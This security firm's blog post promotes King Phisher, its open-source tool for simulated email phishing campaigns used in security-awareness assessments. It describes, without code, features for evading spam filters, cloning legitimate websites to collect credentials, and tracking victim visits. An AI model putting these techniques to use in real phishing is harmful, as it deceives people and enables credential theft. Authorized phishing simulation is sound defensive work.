SecureState Blog

Read SecureState's award winning blog.

SecureState’s King Phisher Program

At SecureState, we often stress to our clients that Social Engineering is one of the most common methods for attackers to gain access. Social Engineering attacks can take many forms, from people calling into companies and trying to get credentials over the phone to people trying to convince security guards to let them into facilities. The most common Social Engineering attacks are email phishing campaigns, which can take a few different forms. These emails can include malicious attachments that can give attackers access to a system, or they can seek to convince a user to visit a website that will grant similar access.


While simulating a phone attack or an outside attempting to get physical access can be difficult, simulating these email based attacks is feasible for many companies, and can provide valuable data to a company on security awareness and any training that needs to take place. To help run these types of campaigns, SecureState has released King Phisher, our open source email phishing campaign program. This program has been developed by SecureState’s security experts based on the numerous Social Engineering assessments we have performed for our clients for years.

King Phisher Features

King Phisher provides companies with the ability to set up email based phishing campaigns, with emails designed to meet the exact specifications of the company. These email messages can contain any number of specific fields, including images built into the emails that don’t need to be downloaded from external sites. These messages can be created as templates, which can be used for retesting and altered as needed.

King Phisher also includes support for Sender Policy Framework, which is used to filter spam by mail servers. By utilizing this framework, King Phisher is able to prevent the phishing campaign from being marked as spam and filtered. While these types of filters do successfully prevent many phishing attacks from getting through, sophisticated attackers know how to bypass them, so your assessments need to do the same.

Recently, SecureState added the ability to clone web pages, which can be used to create incredibly accurate clones of real websites to use as a part of a phishing campaign. One of the more common techniques used in phishing attacks is the use of a legitimate-seeming website to download malware or get an unsuspecting user to enter credentials. King Phisher includes tools that your company can use to build one of these websites by cloning a legitimate site.

King Phisher Reporting

All of these tools are great for running a campaign, but the results of a campaign need to be understood and analyzed to be turned into actionable steps for an organization to take. King Phisher has a wide variety of reporting capabilities to provide organizations with the kinds of actionable data they need.

Reports and charts can be generated showing the number of visits to the fake website, including the unique visitors and repeat visits. The most recent version of King Phisher added the capability to map out where users are connecting from. While this may not be as useful for smaller organizations based in on location, for companies with offices spread out across America or the world, this kind of information can provide valuable guidance on where to focus training efforts.



King Phisher is still in development, and new features are being added on a regular basis. For the full story, as well as the complete technical details of the program, be sure to check on the War Room blog, where SecureState’s experts go into depth on the improvements they add to the program and explore any technical issues in using King Phisher. The suite itself can be found over at SecureState’s Github page and can be downloaded here. To get a full view of how King Phisher works by seeing it in action, take a look at our webinar on Advanced Phishing Techniques.